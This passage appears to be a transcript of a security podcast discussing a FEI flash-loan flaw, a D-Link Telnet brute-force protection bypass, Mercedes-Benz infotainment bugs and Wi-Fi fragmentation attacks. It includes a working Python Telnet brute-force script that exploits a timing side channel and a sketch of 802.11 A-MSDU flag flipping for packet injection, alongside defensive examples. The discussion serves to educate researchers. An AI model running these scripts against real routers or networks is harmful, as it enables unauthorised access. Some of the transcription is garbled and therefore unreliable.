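print(f"profit: {profit:.1f} ETH")   # the attacker ends up ahead
```

The key observation the sketch demonstrates is that the bonding curve's fixed $1.01 price plus allocate's willingness to trade at any slippage turns the attacker's own price manipulation into free money.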
Yeah, it's basically "money printer go brrr" with this
scenario, pretty much. And I guess I will mention, flash loans sound kind of weird, but they're normally used for arbitrage: if you notice a price difference between two crypto coins on different markets, you can use a flash loan to take advantage of that price difference and expand your gains. That's usually, I believe, where they're used. Yeah, but in this case, it just funds capital-intensive attacks, which also seems to be the other use case for flash
loans. So toward the end, they go into some detail on what the best practice should have been here, which is that you should use an oracle as well as a slippage tolerance, so that you know the price you're getting isn't being manipulated, or at least you can mitigate its manipulation when performing these kinds of swaps. So the fix was kind of two-part. One was to change the way that ethereum is deposited into the protocol: it's no longer supplied to the Uniswap pool, instead it's directed into a dedicated reserve stabilizer, which can set some hard limits on the price of FEI. The other fix was to use a 1% slippage tolerance, where before the function had like a hundred percent slippage tolerance on allocation. So that's the other mitigating factor. Overall though, this entire class of attacks, or this vector of issue, should be killed by these fixes. But yeah, I mean, this has got to be the most impactful issue we've ever covered on the show. Fintech is just crazy with how much money gets thrown around over there. It's a very big industry, and that's why originally when I saw it was $800K, I was like, wow, that's crazy. But when you look into the actual issue, it really doesn't seem that crazy of a payout; it makes sense.
So, especially if that had been abused, not only would they have gotten away with a lot more money, it would have destroyed trust in the entire coin. An attack would have been a much larger problem than just the money; it would have killed the coin. I mean, there are questions about whether or not these stablecoins will really last, because historically pegged currencies have always been broken, like the gold standard with the US dollar, and the Swiss franc to Euro peg, things like that. They've always been broken. So there are thoughts that it's going to be the same thing with any of these cryptocurrencies, but that's yet to be seen. But ignoring that aspect, this would have been an early demise, I
guess. Yeah, it's a big problem, because when you're talking about these kinds of markets, anything that gets traded against it is impacted. It's kind of like everything around it gets tainted. So yeah, like I said, I think this is probably the most impactful issue we've covered.
Yeah, although that is also kind of an argument as to why some of these really big attacks don't end up happening: because they undermine all of cryptocurrency. So you end up undermining the value of whatever you stole.
Yeah, it's almost against your best interest in a way. It's kind of interesting like that. Yeah,
yeah, I think Satoshi, whoever the guy who did the Bitcoin white paper was, actually called that out as a security feature in a sense. I think it was in his work, it might have been somebody else's, but yeah,
with cryptocurrency there are so many white papers and stuff, it's hard to say. But yeah, we'll move off of crypto and into our next topic, which is a security assessment of
But yeah, still, I mean, still more than a lot of places would pay out for that kind of access.
But yeah. Yeah, sorry, my notes were a little bit out of order. I think we're back on track now.
So we have one more item first, which is the D-Link router
issue? Yeah, that's where I was going to go next. So this one's another kind of quick one. It's a D-Link router vulnerability in the DIR-842 routers. After this researcher bought one and did some initial research, they discovered they could enable Telnet in the admin panel and connect to it with the admin user credentials. So in that sense, obviously, if you already have the credentials, getting a shell was pretty easy. But they decided to look at Telnet as an attack surface, to see if there were any issues that could be exploited without having the credentials, obviously. And it's kind of an attractive attack surface, as the researcher points out, because it can be hit remotely. It's telling that instead of focusing on memory corruption, he focused on looking for a logic issue, which he did find: a brute-force protection bypass. So, when logging into Telnet, it'll try to somewhat prevent brute force by rate limiting how many attempts you can make. And the way they do that is they make it expensive to have a failed login request, because there's this artificial three-second delay before it tells you that the attempt failed or disconnects you. But there was a bit of a side channel exposed, because a successful login would usually reply with a welcome message within 0.05 seconds or so. So after that much time passed, you already knew it was a failed login, even if you didn't have the message or the disconnect to tell you explicitly that it failed. So you could just create new connections to keep trying. And because the delay was on a per-connection basis, not a global cooldown, you could literally just keep creating connections and try as many times as you wanted. So by continuously spawning connections, trying login credentials, and using that 0.05-second side channel, you can bypass the brute-force protection. That on its own isn't going to enable
you to be able to pop the router immediately. From an attacker perspective, they do still have to brute force, but it is bypassing a protection that's in place. So I think the CVE is kind of fair in this case. Yeah. Usually,
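The side channel described above is easy to picture in code. This is a hypothetical sketch: the prompt strings, router address, and wordlist are assumptions, not taken from the write-up. The real point is the threshold: a success banner arrives in roughly 0.05 seconds, while a failed login sits behind the artificial 3-second delay, so a fresh connection per guess plus a short read timeout sidesteps the rate limiting entirely.

```python
# Sketch of the per-connection timing side channel (assumed prompts).
import socket

THRESHOLD = 0.2  # seconds: well above ~0.05s success, well below the 3s penalty

def looks_successful(elapsed: float) -> bool:
    """Classify an attempt purely by its response latency."""
    return elapsed < THRESHOLD

def try_login(host: str, user: str, password: str) -> bool:
    """One guess on a fresh connection (the delay is per-connection)."""
    with socket.create_connection((host, 23), timeout=5) as s:
        s.recv(1024)                             # assumed login prompt
        s.sendall(user.encode() + b"\r\n")
        s.recv(1024)                             # assumed password prompt
        s.sendall(password.encode() + b"\r\n")
        s.settimeout(THRESHOLD)                  # don't wait out the 3s delay
        try:
            s.recv(1024)                         # welcome banner => success
            return True
        except socket.timeout:
            return False                         # too slow => failed attempt

def brute(host: str, user: str, wordlist):
    """New connection per guess, e.g. brute('192.168.0.1', 'admin', words)."""
    for pw in wordlist:
        if try_login(host, user, pw):
            return pw
    return None
```

Because the 3-second penalty only ever applies to the connection that failed, abandoning the socket after `THRESHOLD` seconds means each guess costs the attacker a fraction of a second rather than three.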
attacking over the network, brute forcing over the network, is going to be slow. It's not a great option in the majority of cases. This being a router, though, you're probably on the same network, so you are going to be able to take advantage of full wireless speeds, presumably. I mean, an attacker could also be wired in, slinging full gigabit speeds against the router. You can do a lot of attempts very quickly that way. In fact, you're probably going to be more limited by the router's CPU than anything else. As a network attack, real brute force just isn't a great option. But this is something I've also seen on web forms, where they'll just sleep to add in that delay, not really understanding why the delay should be there. Like with password storage, you shouldn't be doing just a salted hash or something; you should be using a hash that actually takes time to compute. Exactly how long depends on your security considerations, but the computation itself should be what takes time and slows down the attack, not this sort of artificially introduced delay. So I thought it was still an interesting attack to talk about, although practically, brute force over the network just isn't a great option regardless, unless maybe they're using a small password. Otherwise you're still going to be fairly limited, and it's still going to be pretty loud on the
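The "make the computation itself slow" point can be sketched with a memory-hard KDF from the standard library. The scrypt parameters below are common illustrative values, not a tuned recommendation for any real system.

```python
# Make each verification computationally expensive instead of sleeping.
import hashlib
import hmac
import os

# Roughly 16 MiB of memory per hash (128 * r * n bytes); maxmem gives headroom.
N, R, P = 2**14, 8, 1

def hash_password(password: str, salt: bytes = b"") -> tuple:
    """Derive a slow, salted hash with scrypt; returns (salt, digest)."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt,
                            n=N, r=R, p=P, maxmem=2**26)
    return salt, digest

def verify(password: str, salt: bytes, digest: bytes) -> bool:
    # An attacker pays the same scrypt cost for every guess, so the
    # slowdown can't be bypassed by just opening a new connection.
    candidate = hashlib.scrypt(password.encode(), salt=salt,
                               n=N, r=R, p=P, maxmem=2**26)
    return hmac.compare_digest(candidate, digest)

salt, digest = hash_password("correct horse battery staple")
assert verify("correct horse battery staple", salt, digest)
assert not verify("hunter2", salt, digest)
```

Unlike a `sleep(3)`, this cost is attached to the hash itself: it applies identically whether the guess comes over one connection or a thousand.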
network. Yeah, and you're not getting an immediate compromise, so it's a fairly low-impact issue, but it is interesting in the way it shows that the protection they had in place wasn't really useful. It was just kind of thrown in there, and maybe if you looked at the service as a lazy attacker you would get bored and go away, but if you actually looked at it and tried to get around it, then you could pretty easily. It almost falls into the security-through-obscurity category in that respect, in my view. But yeah. And now we'll move into the open security assessment from Keen Security Lab on Mercedes-Benz. In this report, they detail some background research on the car and the architecture of the infotainment system and whatnot. They also discovered five vulnerabilities in the HiQnet protocol, three of which were in the infotainment ECU, called the head unit, and two of them were in the Hermes module, the telematics ECU, which provides the head unit's internet connection and receives vehicle commands and stuff like that. This report is very long at 91 pages. It's mostly background information though, on the environment, as well as various attack surfaces and some post-attack things you can do.
Like, my thoughts reading this were honestly that if somebody wanted to get into car hacking, this might not be a bad place to look. Now, I don't know enough to say how applicable the Mercedes research is going to be to some other vehicle. There are obviously going to be some similarities, but they do talk about how they set up their test environment, their testbed, the general architecture they're dealing with. Like you said, there's a lot of background here, and I think there's a lot of useful information in it. Shout-out to chat: somebody also just mentioned the Car Hacker's Handbook, which is another resource. I'm not sure how well it's aged, which would be my only concern with that one. That said, I don't know enough to actually comment on whether or not it's worthwhile, but it is another resource out there, this one being, I guess, a bit more recent and a more practical look at things. Yeah, I don't know. I mean, it's an interesting free write-up. There's a ton of information here. I mostly just focused on the vulnerabilities they found in the HiQnet protocol, but they do go into more detail
elsewhere. Yeah, so if you want to look specifically at the vulnerabilities in the report, those are detailed on pages 31 to 45, so only about 14 of the pages in the report are actually dedicated to the vulnerabilities. A lot of the stuff afterwards is post-attack stuff you can do, which, if you want to do car hacking, is probably of interest to you, but if you're not really in that field, you can probably skip those pages. The first vulnerability is an out-of-bounds read when parsing messages, due to an unchecked length field used when calculating the next message's address, so you can get an out-of-bounds memory read of a message. The second issue is an unchecked count field in the MultiSvGet message payload for retrieving SV objects. The third bug is yet another unchecked count field, in the GetAttributes payload of the exact same message type as the last one, the MultiSvGet message. The fourth bug is another unchecked count field, but instead of MultiSvGet, this one is in MultiSvSet, so it's similar to the last issues, just on the set path. The final and probably most interesting issue, purely by virtue of not being a trivial heap overflow, was a type confusion in the MultiSvSet attributes handler. Yeah, so most of the issues, four out of the five, are kind of similar: they just don't do any validation on the count fields that are provided, which seems a bit strange. I kind of would have expected a bit better, but yeah, it's kind of par for
the code that they write. So the way the count field is used, they read into a fixed-size buffer with an unchecked count. I don't know, it's one of those really simple issues that we've actually seen a few times in the last couple episodes: there's some count of things, and they're just copied one by one into a fixed-size buffer without checking the buffer size, or without checking it appropriately. It is such a silly issue, and yeah, that's all I'm going to say
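The bug class we're describing is easy to show in miniature. This is a hypothetical sketch: the message layout below (a big-endian u16 count followed by u32 object IDs) is invented for illustration, it is not the real HiQnet wire format.

```python
# An attacker-controlled count field driving a copy into a fixed-size buffer.
import struct

MAX_OBJECTS = 16  # capacity of the fixed-size destination buffer

def parse_objects_unsafe(msg: bytes):
    """Buggy pattern: trusts the count field. In C, the equivalent loop
    would happily write past a 16-slot stack or heap array."""
    (count,) = struct.unpack_from(">H", msg, 0)
    return [struct.unpack_from(">I", msg, 2 + 4 * i)[0] for i in range(count)]

def parse_objects_safe(msg: bytes):
    """Fixed pattern: bound the count by the buffer capacity AND by the
    bytes actually present in the payload."""
    (count,) = struct.unpack_from(">H", msg, 0)
    available = (len(msg) - 2) // 4          # objects actually present
    if count > MAX_OBJECTS or count > available:
        raise ValueError(f"bogus count field: {count}")
    return [struct.unpack_from(">I", msg, 2 + 4 * i)[0] for i in range(count)]

# A malicious message claiming 0xFFFF objects while carrying only one:
evil = struct.pack(">HI", 0xFFFF, 0xDEADBEEF)
try:
    parse_objects_safe(evil)
except ValueError as e:
    print("rejected:", e)
```

The fix is two comparisons; that four of the five bugs reduce to the missing check is what makes the report feel like the code was never reviewed.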
there. Yeah, with this report I got the impression that, with the vulnerabilities that were found, there's no way this code was thoroughly tested or code reviewed. Honestly, if you were doing an internal security assessment, you should catch these issues pretty quickly. So that was a little bit concerning. I know IoT has always been a bit of a meme, but cars need to be held to a bit of a higher standard, I think, when it comes to how well written their code is in terms of security, because cars are massive machines if somebody gets enough access. I mean, here some of the issues were in the infotainment system, where somebody might be able to unlock the car or open the doors, so the impact isn't super high. But if they can get into a control unit and onto the CAN bus, that's a very dangerous capability for an attacker to have. It's a little bit disappointing that car security is so bad,
though the code and chips running in the engine and stuff are more regulated than the infotainment unit. That's why the infotainment unit is such a common entry point. There are more regulations regarding code standards for the onboard chips than for the infotainment unit, and then there are regulations saying the infotainment unit should be firewalled off from the CAN bus and things like that. I'm not actually sure if that's a formal standard, but there are restrictions regarding certain architectural things, so it's not entirely a wild west. Still, it's bad code. And it is worth noting I'm not sure how practical access for this particular attack would have been, because the way they got access to the HiQnet protocol was by basically soldering onto the board and pretending to be another device. I forget what the device was. Yeah, they removed the CSB from the head unit, soldered onto its test points with an RJ45 cable, literally soldered their own ethernet cable on, plugged it into a PC, and set the PC up to use whatever IP the CSB had. So they were pretending to be the CSB, which had looser firewall restrictions, but it did require soldering onto the
chip. But that is a limiting factor. I do feel like the physical threat model is totally valid, though.
Oh yeah, jailbreaking, for example, would be a thing with cars too. But as an attack, a malicious attack, it's definitely a lot more restrictive than, say, the wireless attacks we've seen on
Tesla. Yes, somebody made the joke in chat earlier about a Mercedes-Benz jailbreak, ETA when? So to balance the scales a little bit for Mercedes-Benz, I did want to call out that Tencent included this little letter at the bottom of their post. I don't know if you managed to take a quick read of it at all, but it was a very positive letter from Mercedes-Benz to Tencent's security lab, basically thanking them for their efforts to disclose vulnerabilities and do it responsibly, saying: "We experienced you as a valuable and professional security research lab. Taking this opportunity we would like to emphasize that we highly appreciate your profound know-how, expertise and the effort you have put in to help further secure our vehicles. We hope you accept this letter as our appreciation for your work." So, I mean, we've covered some issues before where vendors have taken reports very badly, and that's definitely not what happened here. Mercedes-Benz took these kind of in stride, and I wanted to call that out. I thought that was a really cool letter for them to include at the end.
Yeah, I mean, it's a positive response. And as we've said multiple times, I care about the response a company has to vulnerabilities rather than the presence of vulnerabilities. And I do want to shout out, from chat: does it run Doom? We can wish. I mean, can you imagine having Doom on your self-driving car or
something? I would be surprised if it hasn't already been done, in all honesty. I mean, Doom runs on a pregnancy test, so I would expect it.
Well, I know what you're talking about, but that one is only running because he embedded an LCD screen and new internals into the pregnancy test shell. It's not actually running on a pregnancy
test, okay? But still, when you have a complex infotainment system in something like a Tesla or a Mercedes-Benz, I have no doubt in my mind you can do Doom on that. And like I said, I would be surprised if somebody hasn't already done it. So if not, maybe that's a goal for someone to strive towards, if you're listening. All right, we'll move into our last set of issues before we wrap up with shout-outs, which is the presentation on the fragmentation-based attacks at USENIX Security 2021. There was also a tool released to test access points and clients for these types of issues. Several different attacks were detailed, a combination of design and implementation issues. There are a lot of different ways you can read up on these attacks: there's a white paper, there's the USENIX presentation, you can look at the code in the repository. But I would really suggest the USENIX presentation. I actually watched that, and it was really well done, in my opinion.
I mean, the nice thing about conference presentations in general, and actually a lot of the times when we've talked about conference presentations and papers on the podcast, I've watched the presentation first. That's my preference, rather than going through the actual paper first. They usually do a pretty good job of giving you the headlining points and what actually matters. They might skip some of the details, because at an academic conference presentation, unlike, say, DEF CON or something, they only get like 10 or 15 minutes. That's all they get to present their paper, very limited. So they usually give you the key points, though not necessarily the most eloquent talk, since it's academics presenting rather than people with a lot of presentation experience. But yeah, this one was a good presentation to watch; the link will be in the description.
Yeah, and I think the quick aspect of it only being like 15 minutes was what made it really digestible and made me want to watch it in the first place, because some of those conference presentations that are an hour long are a little bit dry to get through sometimes. So yeah, the concise aspect is nice. So, like I said, it's a combination of design and implementation issues, and they all assume that you have man-in-the-middle capability, which is a fair place to argue from. Sorry, I just have to pull up the video. These all affect WPA3 and WPA2, and some of them have existed since WEP, which has been around since, I think, 1997 or something. So some of these issues go back decades, and there's an abundance of access points and clients that are vulnerable to at least one of the detailed attacks. Starting out with the design flaws: the first is in packet aggregation, where packets can get aggregated together for efficiency purposes. So instead of just sending one large packet each time, a frame can consist of sequential embedded packets with metadata attached to the front of each. And what defines whether or not a frame is an aggregated frame is a flag that comes just after the header, and the problem is that flag is not authenticated. So if you're in the middle, you can just flip that flag from false to true on what's not supposed to be an aggregated frame, and you can give yourself the ability to inject arbitrary packets by faking an aggregated one.
Basically, I thought that was a really cool attack. It does depend on you being able to control the data in the packet. So the example they use is: if the victim requests a page, or I think they specifically say an image, off of an attacker-controlled domain, you kind of control the data that's going to be in that packet. And then as the attacker, you're also man-in-the-middle, so you're able to flip that flag on the actual Wi-Fi packet, or frame, being sent over the air. The content is still encrypted, you can't actually see it, but the header isn't protected. I thought it was a really cool attack, just being able to inject packets like that; it's not something I'd ever really considered being able to do. The actual attack they use is an ICMPv6 router advertisement, so you can advertise a new DNS server that the victim should use if they haven't set one specifically. An interesting attack there, but just, I don't know, injecting packets seems like it could be a very useful primitive to have, and definitely an interesting attack concept in how it comes about, even if it's difficult to execute in practice. They do have, among some of the other issues they talk about, quite a few implementation issues that make it easier to actually perform this, such as removing the need for user interaction by sending a special packet to some servers that don't handle it properly. But on the whole, you need to control the data frame and flip the fragment
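The flag flip itself can be sketched concretely. In an 802.11 QoS data frame, the "A-MSDU Present" bit lives in the QoS Control field, which is not covered by the frame's integrity protection. The 24-byte offset below is an assumption: it holds for a simple three-address QoS data frame with no Address 4 or HT Control fields, which is the common case, but real tooling would parse the header properly.

```python
# Minimal sketch of the aggregation design flaw: setting the
# unauthenticated A-MSDU flag on an intercepted, still-encrypted frame.

AMSDU_PRESENT = 0x80   # bit 7 of the first QoS Control byte
QOS_CTRL_OFFSET = 24   # right after the basic 3-address MAC header (assumed)

def flip_amsdu_flag(frame: bytearray) -> bytearray:
    """Mark an intercepted frame as aggregated.

    The encrypted payload is untouched; the receiver will now parse that
    payload as a sequence of A-MSDU subframes, so attacker-controlled
    data inside it (e.g. part of a fetched image) gets interpreted as
    injected packets.
    """
    frame[QOS_CTRL_OFFSET] |= AMSDU_PRESENT
    return frame
```

Because only the header byte changes, the frame still decrypts and verifies fine on the receiver; the protocol design simply never bound that flag to the ciphertext.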
Yeah, the deactivation flag. Yeah,
yeah, sorry, I was thinking of the other one.
Yep, no worries. The second design issue has to do with packet fragments, specifically when they're being cached, mainly the fact that those cached fragments will not be cleared when a client disconnects. So if an attacker sets up a spoofed MAC address, sends some malicious fragments, and gets some stored in the cache, those can get reused later when the victim connects, and that can allow for both packet injection and leaking packets. So it's almost like poisoning the cache on the access point. Basically, I thought the design issues in particular were really cool attacks, just in how they work. The third design problem is with how fragments can all be sent with different keys when encrypting
them on the last one though with the fragment cash, like, if you want to show like that, that again, is a really cool primitive to gain where You know, you connect, you spoof some injuries into the fragment cash and then the victim connects and they end up their necks like fragmented, packable use potentially use your cash fragment, like, basically, again, it's being able to inject little bits of the packet, being able to control perfect. That's just, you know, another really cool perimeter. I mean, all of these, I think are cool Primitives even though they are somewhat academic in terms of Performing them, especially this next one which will let you get back to the
describing. Yeah, so the third problem is how fragments can be sent with different keys encrypting them. Since an attacker in the middle can choose which fragments to pass on and which to drop, they can drop fragments entirely, and for whatever reason the other end will attempt to reassemble fragments even after the session key gets refreshed and later fragments are sent under a different key. So you can get fragments encrypted with different session keys assembled together, which could potentially allow packets to be leaked. Like zi said, of the three design-flaw attacks, this one seems to be the least practical. In the presentation, the researcher even noted this is mostly academic. I was kind of thinking the same thing when he was explaining the issue: I don't really see why an attacker would want to do this, what they could really gain by doing it, or how they could do it easily.
That's the thing, I have no idea how you would use this in an attack, but I love the primitive here. It's such a cool issue, I think, to just be able to play Legos with the packets. Obviously, it depends on the session key changing, so it needs to be periodically refreshed, which isn't a common setup, and again, there's an implementation issue that can make it a little easier. But it's such a cool primitive. No idea what you'd do with it, but I love the idea of it nonetheless.
Yeah. There were also various implementation flaws. Only a few of them were covered in the presentation; I think they're a lot less interesting than the design issues. It was mostly just silly stuff, like plaintext frames being accepted in certain situations where they shouldn't be, such as when the frame is fragmented, or when the frame resembles a handshake message. The other one covered was the fact that some devices and software don't support fragmentation but will treat fragmented frames as full ones, so you can cause a confusion that in certain situations leads to frame injection. I think they called out OpenBSD and another piece of software in the presentation. Yeah, the implementation flaws are mostly just things that can augment taking advantage of the design flaws, as far as I could tell. But the design flaws were really awesome in how they worked. If you want to look at the issues more in depth, like I said, there is a white paper, as well as that tool for testing clients and access points, but I really recommend checking out the presentation if you don't want to check out anything else. It was really concise, really well done, and straightforward, especially for me. I'm not really into netsec, I don't really do networking, but the diagrams paired with the explanations in the presentation were very clear, even if you're not familiar with that kind of stuff. And they're very upfront about the impact, like we were saying, with the issues being academic,
but yeah, I do think some people have kind of run off crying wolf, I guess, treating this one as a lot more substantial of an attack than it was. But the resources have been pretty fair about what they've actually got
here. Yeah, definitely can't blame the researchers in this case. Like I said, they were very upfront, so that was just kind of the media up to its old tricks, taking things and running away with them. So, you know, not their fault. But yeah, with that said, I think we can move into our show notes. So zi, I'll let you cover the first one, and then I have a few of my own as well.
Yeah, the first one is a post from Connor McGarr. We actually covered one of his other posts, a browser use-after-free, I think a couple episodes ago. He did another post, this one looking at a Dell driver. Again, a very long post with plenty of background, which I kind of appreciate. I mean, he's trying to break everything down for somebody who doesn't have a background in driver exploitation, which can be beneficial. If you're learning, it's a good resource; go give it a read and work through everything. If you're already familiar, maybe it's a little bit much, but I did want to at least give it a quick
shout-out. Yeah, it is quite a long post, so that's part of why we didn't cover it. But long doesn't necessarily mean bad; it'll just take a little bit to get through. One of my show notes is that Project Zero put out a project for fuzzing targeting Hyper-V emulated devices. They didn't really put out a post, so there's not too much to talk about here, which is why I mostly left it as a shout-out. But we love talking Hyper-V, and we do talk about fuzzing quite a bit, obviously. So I wanted to shout out the fact that they dropped this coverage-guided fuzzer, and it's something you can check out if Hyper-V is an area of interest to you.
Yeah, I mean, I'm really interested in this, because Hyper-V has been a target I've talked about diving into but haven't really gone about it yet. So I actually might check this out and play around with it a bit. I mean, I'm excited to see something targeting
hyper-v. Yeah, I don't know if Project Zero is planning to drop a blog post at some later point to go along with it. As of yet I haven't seen one, but if they do drop one, then we'll cover it more in-depth. I think the last shout-out is that Ida Free has finally dropped with the cloud decompiler. For a while, Ida Home was kind of the testing ground for the cloud-based x86-64 decompiler; now it's finally landed in Ida Free. This actually happened I think two weeks ago, but we were a little bit late on it and I didn't include it in last week's episode. I am going to be doing a stream, and I think zi is planning on joining me for it too. I do want to do a stream looking into the cloud-based decompiler, just to see how well it works and how viable it is if you, you know, don't have the money to put up front for Ida Pro, and you have, you know, some moral compass, I guess. So yeah, I want to take a look at the cloud decompiler, see how well it works. I've heard some not-so-great things about it, mainly that it's really slow and it's kind of haphazardly thrown in there. But like I said, I want to do a stream taking a look at it myself, and I think that could be fun. We don't have an exact date nailed down for when we're going to do that; I'm thinking maybe Friday. But you can join our Discord and check out our Twitter, we'll always announce when we're going to be doing streams like that. I just wanted to shout that out if you want to take a look at it, and if you have been looking for a decompiler solution and Ghidra has not been doing it for you, then you can check out the cloud-based decompiler here first.
Of course, Binary Ninja Cloud, that's free, is it not? I mean, it's limited, I think, to like five-megabyte executables, which is a pretty big limitation, but otherwise, I mean, it's free. I believe it has the decompiler in there too. So there is that as an option.
Yeah, like you said though, it is a bit limited. I don't believe the Ida cloud-based decompiler has that limit, but I did not confirm that, so I'm not sure. Yeah, we'll find out on the stream.
Yeah, I don't know. I mean, somebody in chat mentioned that Ida is bad. I have been trying to avoid using Ida; I've dropped it, I don't even have it installed, just on a more personal level. But it's a tool, I mean, you can use it if you want to. Personally I just don't, because the company's lost a lot of goodwill with me, so on a personal level I don't use it. But it's a tool, and it is the standard tool for a lot of this work, so it's worth at least knowing and using a bit. You might be in a scenario where it's your only option; I have been in that scenario before. Or I guess there's Cutter and r2, or Rizin. But yeah, I mean, we'll be taking a look at it. I think it's still worth looking at even if I'm not a big fan of Ida. Yeah. I mean, ultimately,
it's free, right? So there's no harm in taking a look at it, and if you like it, then that's awesome. It is kind of funny though, because to me, Ida Home was already not worth it in any way, shape, or form; now it's even less worth it with this. I think they're making Ida Free better, and Ida Pro has always been kind of good if you can afford it. Ida Home is just in this weird middle land where nobody really cares about it. I would be surprised if they've sold many licenses for Ida Home.
I mean, Ida Home is just in the wrong price range; that, I think, has been the big thing. It's not that it has features nobody wants, it's that it has features people want at usually way too high a
price. Yeah, it just doesn't really know what it wants to be. But yeah, Ida Free at
least, they know they're hitting the corporate pricing just right there; I think they know what they're targeting. That's fair. I can't really say Ida Home gives them a run
for it though.
I mean the pricing still is
maybe, but you're not supposed to use it in corporate environments, so that's what I mean, it's kind of confused about what it wants to be. Anyway though, I do want to commend Hex-Rays a little bit; they have been putting work into making Ida Free better. I remember when Ida Free was very bare-bones, it didn't really have anything. I don't even remember if you could analyze 64-bit at one point in Ida Free, so the fact that it can analyze both 32-bit and 64-bit and you've got an x64 decompiler, I mean, that's pretty nice. So it's worth checking out if you're looking for a decompiler solution. And like I said, we will be doing a stream on that. With that said, thanks to everyone who tuned in. VODs are up on Twitch and YouTube, as well as Anchor, 24 hours after the podcast. Before we head out, I'm going to quickly plug again that we do have a few discussion videos coming this week, talking about making the transition from CTF to real-world vulnerability research and exploitation. It's a bit of a mini-series of three parts, and it will be released on Thursday, Friday, and Saturday.
Yeah, that's something we've been working on and wanted to get done for quite a while, since we did that getting-started one. Thank you, spark 21, for the sub. Looks like that's two months.